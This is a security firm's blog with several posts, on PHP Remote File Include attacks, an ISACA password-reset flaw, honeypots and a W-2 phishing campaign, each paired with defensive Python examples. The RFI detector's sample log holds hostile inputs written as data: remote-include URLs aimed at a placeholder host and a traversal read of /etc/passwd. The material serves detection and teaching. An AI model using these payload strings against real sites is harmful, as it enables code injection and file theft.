PHP RFI: Old Attack, Common #FAIL

I just completed the slides for my new presentation on application security. It is focused on understanding Remote File Include attacks against PHP implementations.

The preso covers what they are, how common they are, metrics, signatures, code examples and guidance for finding and mitigating them.

If there is interest, I will try and either record audio or video of the presentation and post that separately. If you would like to see/hear that in the near future, leave a comment below.

This research and the resulting project were made possible by two facets of MicroSolved, Inc. that we don’t talk a lot about, so here is some info on the power behind this project.

The first is our application security assessments. We have really been focusing on these projects recently and my team has been working hard to complete assessments for clients, as well as a variety of open source/community tools. As a part of our deep lab capability here and our relationship with Syhunt, in Brazil, we have been working together to test and improve their Sandcat4PHP and Sandcat Pro products (which we distribute/resell for them in the US). Essentially, this gives us a very deep capability to “grey box” test PHP applications. For those unfamiliar with grey box testing, that means that the tools and engineers have both access to the source code (white box) and a usable testing implementation (black box). Combined, this testing methodology creates a very robust, accurate and thorough capability to exercise and examine an application. Manual and automated assessments intertwine to achieve maximum width and depth of assessment.

The second facet that powered this project was the HoneyPoint Internet Threat Monitoring Environment (HITME). This is a rapidly-growing network* of HoneyPoint deployments donated to MSI for the purpose of gathering attack data. The HoneyPoint agents are deployed in a variety of international locations to give us a real-time, global view of attacker sources, frequency and tactics for our research projects. The HITME is a unique capability to MSI and brings us data that most other security organizations can only dream of. In turn, we take the gathered knowledge and give it back to the security community in presentations and projects like this and the @honeypoint/#HITME feeds on Twitter and use it to protect our clients against an ever-growing arsenal of threats.

Combined, these capabilities have helped us identify hundreds of new PHP RFI attack signatures (which we plan to release shortly), find privately released PERL and PHP attack code/bot-net infectors (shared with the AV & IDS/IPS vendors) and build this presentation for the security community.

It also opened our eyes to just how popular PHP has become and how large the footprint is in corporate organizations and businesses around the world. In a recent survey, about 50% of the polled population stated that they did not have PHP in their enterprise, but did indicate that they use some combination of WordPress, Drupal, Joomla, Moodle, etc. All of these technologies are written in and utilize PHP! To the MSI team, this represents another area where the underlying technology is not understood in our corporate networks. This is another “unknown” for the attacker to leverage.
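To make the “finding and mitigating” part concrete, here is an added example (my own illustration, not the HITME signature set or the Syhunt tooling) that flags RFI attempts in Apache combined-format access logs and checks the php.ini settings that let include() fetch remote code. The log lines, addresses and paths are constructed placeholders.

```python
"""Flag PHP Remote File Include (RFI) attempts in web-server access logs.

Added example for this post (not the HITME signatures): the log lines, IPs
and paths below are constructed placeholders in documentation ranges.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# An RFI payload is a parameter value that PHP's include() would resolve
# through a remote stream wrapper: a URL scheme or an inline data: stream.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://|^\s*data:', re.IGNORECASE)

# Constructed sample log. Line 1 and 3 are RFI attempts (line 3 is URL-encoded),
# line 4 is path traversal (a different signature), line 5 is a benign search
# whose value merely contains a URL.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Feb/2010:03:14:07 +0000] "GET /index.php?page=http://203.0.113.9/x.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.4 - - [10/Feb/2010:03:14:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2010:03:14:11 +0000] "GET /modules/x/y.php?inc=ftp%3A%2F%2F203.0.113.9%2Fa.txt HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
192.0.2.5 - - [10/Feb/2010:03:15:00 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 403 120 "-" "Mozilla/5.0"
192.0.2.8 - - [10/Feb/2010:03:15:30 +0000] "GET /search.php?q=see+http://example.com/page HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def find_rfi_attempts(log_text):
    """Return one dict per (request, parameter) whose value points at a remote stream."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double-encoded payloads.
            decoded = unquote(value)
            if REMOTE_RE.match(decoded):
                hits.append({
                    "src": m["src"],
                    "param": name,
                    "value": decoded,
                    "status": int(m["status"]),
                    "ua": m["ua"],
                })
    return hits


def summarize_sources(hits):
    """Count RFI attempts per source address (input for a blocklist or a feed)."""
    counts = {}
    for h in hits:
        counts[h["src"]] = counts.get(h["src"], 0) + 1
    return counts


def check_php_ini(ini_text):
    """Return the php.ini settings that leave include() able to fetch remote code.

    allow_url_include=Off is the server-side mitigation for RFI; allow_url_fopen
    governs file_get_contents() and friends, and is reported for completeness.
    """
    findings = []
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ini comments
        if "=" not in line:
            continue
        key, _, val = (p.strip() for p in line.partition("="))
        if key in ("allow_url_include", "allow_url_fopen") and val.lower() in ("on", "1", "true"):
            findings.append(f"{key} is enabled")
    return findings


if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG)
    for h in hits:
        print(f'{h["src"]} -> {h["param"]}={h["value"]!r} (HTTP {h["status"]})')
    print(summarize_sources(hits))
    print(check_php_ini("allow_url_fopen = On\nallow_url_include = On ; risky\n"))
```

The detector keys on where the value starts, not on whether it contains a URL, which keeps search boxes and referrer-style parameters out of the alert stream; a 200 response to a flagged request is the one to investigate first, since a 403 or 404 usually means the include never resolved.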

I hope you enjoy the presentation slides and I look forward to presenting this in public. If you would like to discuss more about our application security capabilities or the HITME, please let me know.

* Organizations and individuals can donate the operation of an Internet facing HoneyPoint Agent to MSI. Depending on the situation, they may receive a free license for HoneyPoint or the HoneyPoint Managed Service for their organization or home network. If you think you might be interested, please let me know and we can discuss how we might be able to work together.

Why I No Longer Have a Login at ISACA.org

After much conversation with the folks who manage the ISACA.org site and quite a bit of frustration trying to reach the people responsible for the site within ISACA, I had a good discussion with them last night and they have removed my login credentials by my request. While I have been and continue to be a supporter and member of ISACA, I disagree with them over this particular issue.

The problem is that the ISACA.org password reset mechanism sends your password in clear text to your registered email address. An attacker, or anyone, only needs to know or guess a user name to cause the system to send the password. If an attacker initiates this process and can gain access to the email system or the email itself in transit, then they gain access to a live, user generated password.

The threat model for this is obvious and commonly exploited. Users, even security folks, often re-use the same passwords around the Internet for a variety of sites. If the attacker can gain the password by exploiting this mechanism, then it becomes easy to try and leverage those credentials on a myriad of sites and accounts. Similar attacks have been quite popular lately and have proven effective for high level compromises on social media, e-commerce and other popular sites.

When I explained the problem to the web manager, he did not disagree with either the risk or the attack vectors. He only explained that they had known of the problem for a year or so and that their mitigation was to launch a new web site. He assured me the new site would be ready within a few months. He explained that the new site, in accordance with current best-practices, would include a new reset mechanism for passwords that used a token URL link or the like instead of a plain text password. I suggested that they remove the current mechanism from use until then and he said they would explore that as an option.
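The token-link mechanism the web manager described is simple enough to sketch. The following is an added illustration of it, not ISACA’s code or the new site’s design; the in-memory user store, the outbox standing in for a mailer, and the example.invalid link are assumptions. The point it makes is that the e-mail carries a short-lived, single-use token and never the password.

```python
"""Token-based password reset versus e-mailing the password itself.

Added example; not ISACA's code. The dict-based user store, the outbox that
stands in for a mailer and the reset URL are constructed for illustration.
"""
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # a reset link should expire quickly
PBKDF2_ROUNDS = 200_000


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the site never keeps a recoverable password."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, candidate):
    salt_hex, digest_hex = stored.split("$", 1)
    recomputed = hash_password(candidate, bytes.fromhex(salt_hex))
    return secrets.compare_digest(recomputed, stored)


class ResetService:
    def __init__(self, users, clock=time.time):
        self.users = users      # username -> {"email": ..., "pw_hash": ...}
        self.pending = {}       # sha256(token) -> (username, expires_at)
        self.outbox = []        # constructed mailer: list of (to, body)
        self.clock = clock      # injectable so expiry can be tested

    def request_reset(self, username):
        """Mail a one-time link. Behaves the same for unknown users (no enumeration)."""
        user = self.users.get(username)
        if user is None:
            return
        token = secrets.token_urlsafe(32)
        # Only a hash of the token is stored: a database read does not yield usable links.
        digest = hashlib.sha256(token.encode()).hexdigest()
        self.pending[digest] = (username, self.clock() + TOKEN_TTL_SECONDS)
        link = f"https://example.invalid/reset?token={token}"
        self.outbox.append((user["email"], f"Reset your password: {link}"))

    def complete_reset(self, token, new_password):
        """Consume the token (single use), enforce expiry, then set the new hash."""
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self.pending.pop(digest, None)
        if entry is None:
            return False
        username, expires_at = entry
        if self.clock() > expires_at:
            return False
        self.users[username]["pw_hash"] = hash_password(new_password)
        return True


def legacy_reset_body(stored_password):
    """What the clear-text scheme in the post amounts to: the mail IS the credential,
    and it only works at all if the site keeps passwords in recoverable form."""
    return f"Your password is: {stored_password}"


if __name__ == "__main__":
    svc = ResetService({"alice": {"email": "alice@example.invalid",
                                  "pw_hash": hash_password("s3cret original")}})
    svc.request_reset("alice")
    print(svc.outbox[-1][1])   # a link, no password
    print(legacy_reset_body("s3cret original"))  # the failure mode being criticised
```

Intercepting the e-mail in transit still yields something in the token scheme, but only a link that stops working after one use or fifteen minutes, and that reveals nothing reusable on other sites.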

My main point on this issue is that I expect more from ISACA. I expect that since they are teaching the world to audit systems and processes for security, that they themselves would have secure processes. I especially have a hard time accepting that they knew of this problem for a year and chose to accept the risk without any additional controls being implemented, thereby placing the residual risk squarely on the shoulders of their members. To make matters worse, they transferred this risk to the membership without so much as a reminder or disclosure statement on their site about the problem. I understand that they may have resource constraints around managing the site, as he explained, but these are the same issues that all organizations face, including the very organizations from which their training teaches people not to accept this explanation.

While the discussion was amiable and professional, I am left with my disappointment. I got no assurances that anything would be done differently until the new site is launched and I got no sense for how that new site will be peer tested, reviewed or the like. Thus, I asked them to remove my account until that time. This is also the reason I am making this post. I want all ISACA members to be aware of the risk and that their credentials could potentially be exposed. Hopefully, none of the membership reuses their password around the web, but that seems unlikely. At least now, if they read this blog post, they will be aware.

Please feel free to let me know your thoughts on this issue by leaving a comment below. You can also contact ISACA by phone. Their numbers are listed in the contact us portion of their website.

Lastly, I want to say that I continue to support ISACA and their membership. I think their mission is critical and that their training is a strong positive for the security community and the world at large. As always, thanks for reading!

Interesting Bot News

In the last couple of days, there have been a couple of interesting pieces of bot-net news.

This one discusses how a bot-net software war is brewing over control of your PC. Some bots are now including kill code for other bots. In this case, the new kid on the block is killing Zeus code to make sure it has sole control over your fraud.

Then there was this one about MS10-015, where the bot authors have fixed their rootkit code to make the BSOD go away. They did this not as a favor to MS or anything, but to restore use of the PCs and their chain of fraud. They also wanted to cover up their own code to keep users from cleaning it.

Interesting stuff around the bot threat landscape…

Broken Window Economics and Being “Type B”

I am actually quite glad that this article was written. I agree with its premise and I am very glad that MicroSolved is a “type B” security vendor. I am OK with that. It fits my world view. I am OK with not being a member of the “PCI in crowd” or doing infosec “just like all of the other vendors.” In fact, I STRIVE for MSI to do it differently. I PUSH my organization to serve our clients at a higher level. I STRAIN to help them achieve leverage. I think being “type B” makes MicroSolved INVALUABLE as a security partner.

That, in my book, is worth far more than being popular, one of the crowd or getting industry trophies and certificates. Those things might be nice for some, but helping OUR CLIENTS serve their customers in a safer way is just more our focus at MSI.

New Emerging Web Scans from the HITME

We started picking up a few very low intensity scans last night. Their pace is increasing. They appear to be aimed at cataloging users of the ANT tool. You can find a list of the scanning targets and a link to BrainWebScan here, if you would like to check for them yourself.

If you are a MicroSolved Managed Assessment (GuardDog) client, your systems will be tested during your next scheduled assessment.

If you have any questions or would like to know more about our ongoing assessment services, threat management or application security testing, feel free to email us at info [at] microsolved [dot] C O M or give us a shout at 1-877-351-1237. We would love to discuss it with you!

We Have An iPhone App for Our Blog!

Our press release:

MSI RELEASES IPHONE APP FOR “STATE OF SECURITY” BLOG
MSI Offers Free Tool to Allow Access to Blog’s RSS Through iPhone App

COLUMBUS, Ohio January 26, 2010 — MicroSolved, Inc. (MSI) is pleased to introduce a fun free tool to add to a user’s iPhone app menu. Now readers of the “State of Security” blog can easily keep track of updates through a simple application that is available through Apple’s iTunes Store. The tool is designed to make it easier for security people to track emerging threats and stay up to date with security news.

MicroSolved’s “State of Security” blog not only covers an array of security topics, but also is the launching pad for collaborative projects and quick online chats regarding “hot” threats of the day. The blog is very popular among security teams, CISOs and others with an interest in information security.

Those who would like to add the free application to their iPhone can download it here.

FLASH Campfire Chat January 22 at 10 AM: The Aurora Vulnerability

Much media attention has been focused on the recent Internet Explorer vulnerabilities and the attacks and compromises of several large companies. Rumors are flying fast and furious around the Internet. Come learn about the technical exposures of these vulnerabilities, the suggested options for protection of your organization, and a discussion about what your peers are doing to manage this and other client-side attacks. Cut through the hype, ignore the hyperbole and let’s get down to the brass tacks. Attendees of this session will get an overview of the Aurora vulnerability, insights into client-side attack tactics and come away with suggestions for risk minimization.

Here are the details:

Date: Friday, January 22
Time: 10:00 AM EST
Location: Our Campfire Chat Room

Looking forward to seeing you there!

How Honeypots Can Help You

A honeypot is a trap set to detect or deflect attempts at unauthorized use of information systems. Generally it consists of a computer, data or a network site that appears to be part of a network but which is actually isolated and protected, and which seems to contain information that would be of value to attackers.

It is important to note that honeypots are not a solution in themselves. They are a tool. How much they can help you depends upon what you are trying to achieve.

There are two different types of honeypots: production and research. Production honeypots are typically used by companies and corporations. They’re easy to use and capture only limited information.

Research honeypots are more complex. They capture extensive information, and are used primarily by research, military, or government organizations.

The purpose of a production honeypot is to mitigate risk to an organization. It’s part of the larger security strategy to detect threats. The purpose of a research honeypot is to collect data on the blackhat community. They are used to gather the general threats against an organization, enabling the organization to strategize their response and protect their data.

The value of honeypots lies in their simplicity. It’s technology that is intended to be compromised. There is little or no production traffic going to or from the device. This means that any time a connection is sent to the honeypot, it is most likely to be a probe, scan, or even attack. Any time a connection is initiated from the honeypot, this most likely means the honeypot was compromised. As we say about our HoneyPoint Security Server, any traffic going to or from the honeypot is, by definition, suspicious at best, malicious at worst. Now, this is not always the case. Mistakes do happen, such as an incorrect DNS entry or someone from accounting inputting the wrong IP address. But in general, most honeypot traffic represents unauthorized activity. What are the advantages to using honeypots?

  1. Honeypots collect very little data. What they do collect is normally of high value. This eliminates the noise, making it much easier to collect and archive data. One of the greatest problems in security is sifting through gigabytes of useless data to find something meaningful. Honeypots can give users the exact information they need in a quick and easy-to-understand format.
  2. Many security tools can drown in bandwidth usage or activity. NIDS (Network Intrusion Detection Systems) may not be able to handle network activity, and important data can fall through the cracks. Centralized log servers may not be able to collect all the system logs, potentially dropping logs. The beauty of honeypots is that they only capture that which comes to them.
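A small listener makes the “any connection is suspicious” property tangible. What follows is an added example written for this post, not HoneyPoint code: a TCP honeypot bound to a spare port that records every inbound connection, separates a bare connect (a scan) from a connection that sends a request, and carries an allowlist for the known-mistake case the post mentions (the host with the wrong DNS entry). The FTP-style banner and the addresses are constructed.

```python
"""Minimal TCP honeypot: nothing legitimate talks to it, so every connection
is an event. Added example, not HoneyPoint code; banner and allowlist are
constructed.
"""
import socket
import threading
import time


def classify(ip, port, data, allowlist=()):
    """Label one inbound connection.

    allowlisted: a source we already know is misconfigured (the DNS-typo case)
    probe:       connected and went away without sending anything (scan)
    interaction: sent a request, i.e. tried to use the fake service
    """
    if ip in allowlist:
        verdict = "allowlisted"
    elif data:
        verdict = "interaction"
    else:
        verdict = "probe"
    return {"time": time.time(), "src": ip, "sport": port, "data": data, "verdict": verdict}


class MiniHoneypot:
    def __init__(self, host="127.0.0.1", port=0,
                 banner=b"220 ftp.example.invalid ready\r\n", allowlist=()):
        self.banner = banner
        self.allowlist = set(allowlist)
        self.events = []               # the whole "log": one entry per connection
        self._stop = threading.Event()
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock.bind((host, port))  # port 0 = let the OS pick a free one
        self._sock.listen(8)
        self._sock.settimeout(0.2)     # so the accept loop can notice stop()
        self.port = self._sock.getsockname()[1]
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def stop(self):
        self._stop.set()
        self._thread.join()
        self._sock.close()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, (ip, sport) = self._sock.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(2.0)
                try:
                    conn.sendall(self.banner)   # look like a real service
                    data = conn.recv(512)       # capture only the first request
                except (socket.timeout, OSError):
                    data = b""
            self.events.append(classify(ip, sport, data, self.allowlist))


def wait_for_events(hp, count, timeout=3.0):
    """Block until the honeypot has recorded `count` events (or give up)."""
    deadline = time.time() + timeout
    while len(hp.events) < count and time.time() < deadline:
        time.sleep(0.02)
    return len(hp.events) >= count


if __name__ == "__main__":
    hp = MiniHoneypot().start()
    # Constructed "attacker": connect, read the banner, send one FTP command.
    with socket.create_connection(("127.0.0.1", hp.port), timeout=2) as c:
        c.recv(64)
        c.sendall(b"USER admin\r\n")
    wait_for_events(hp, 1)
    hp.stop()
    for e in hp.events:
        print(e["verdict"], e["src"], e["data"])
```

Each event is small and self-explanatory, which is the first advantage above in practice; and because the listener only ever sees the traffic aimed at it, it never drops data under load, which is the second.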

Many of our clients swear by our HoneyPoint family of products to help save resources. With its advantages, it’s easy to see why! Leveraging the power of honeypots is an excellent way to safeguard your data.

Beware: Fraudulent W-2 Emails Ahead

Tax season is upon us and spammers are taking full advantage of the situation. Reports of fraudulent emails that appear to come from the IRS are popping up. The email states that all employers need to complete the attached W-2 update form. Unfortunately, the attachment contains a remote administration tool that allows the attacker to execute commands on the system.

The malicious file is named W2-Form and has various file extensions, including .rtf, .pdf, and .doc.

While this attack targets employers, I suspect that the next wave will target employees. Possible scenarios include malicious attachments as described above and directing employees to fake corporate websites.

Employers should notify their employees of how W-2 information will be delivered and warn them of possible fraudulent emails. For more information on reporting these types of malicious emails, visit

http://www.irs.gov/privacy/article/0,,id=179820,00.html
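For mail administrators who want to catch this lure before it reaches payroll, here is an added triage script (my own example, not an IRS or MSI tool) that uses only the two facts the post gives: the attachment stem “W2-Form” with a varying extension, and a sender that claims to be the IRS. The sample messages, addresses and domains are constructed.

```python
"""Triage an e-mail for the W-2 lure described in the post.

Added example; not an IRS or MSI tool. The two sample messages and every
address/domain in them are constructed.
"""
import email
from email import policy
from email.utils import parseaddr

IRS_KEYWORDS = ("irs", "internal revenue")
IRS_DOMAIN = "irs.gov"
LURE_STEMS = {"w2-form", "w2form"}   # "W2-Form" with any extension; '_' folded to '-'

# Constructed phishing sample: IRS display name, unrelated sender domain,
# attachment named as reported (a harmless base64 stub stands in for the payload).
SAMPLE_EML = """\
From: "Internal Revenue Service" <update@irs-forms.example>
To: payroll@company.example
Subject: W-2 update form required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/plain

All employers must complete the attached W-2 update form.
--B1
Content-Type: application/octet-stream; name="W2-Form.pdf.doc"
Content-Disposition: attachment; filename="W2-Form.pdf.doc"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAA==
--B1--
"""

# Constructed benign sample for comparison.
BENIGN_EML = """\
From: "Alice Example" <alice@company.example>
To: payroll@company.example
Subject: January invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B2"

--B2
Content-Type: text/plain

Invoice attached.
--B2
Content-Type: application/pdf; name="invoice-0142.pdf"
Content-Disposition: attachment; filename="invoice-0142.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--B2--
"""


def sender_domain(msg):
    _display, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def claims_irs(msg):
    display, _addr = parseaddr(msg.get("From", ""))
    return any(k in display.lower() for k in IRS_KEYWORDS)


def lure_attachments(msg):
    """Attachment filenames whose first dotted component matches the lure stem.

    Taking the first component (not the last) means W2-Form.pdf, W2-Form.rtf
    and a double-extension W2-Form.pdf.doc are all caught.
    """
    names = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        stem = name.lower().split(".")[0].replace("_", "-")
        if stem in LURE_STEMS:
            names.append(name)
    return names


def triage(raw):
    """Return a list of human-readable reasons; an empty list means nothing matched."""
    msg = email.message_from_string(raw, policy=policy.default)
    reasons = []
    domain = sender_domain(msg)
    if claims_irs(msg) and domain != IRS_DOMAIN and not domain.endswith("." + IRS_DOMAIN):
        reasons.append(f"display name claims IRS but sender domain is {domain!r}")
    for name in lure_attachments(msg):
        reasons.append(f"attachment {name!r} matches the reported W2-Form lure")
    return reasons


if __name__ == "__main__":
    for label, raw in (("phish", SAMPLE_EML), ("benign", BENIGN_EML)):
        print(label, triage(raw) or ["no findings"])
```

Either reason alone is worth a quarantine; the attachment check is the cheap one, and the display-name-versus-domain check generalises to any “agency name in the From header” lure beyond this W-2 wave.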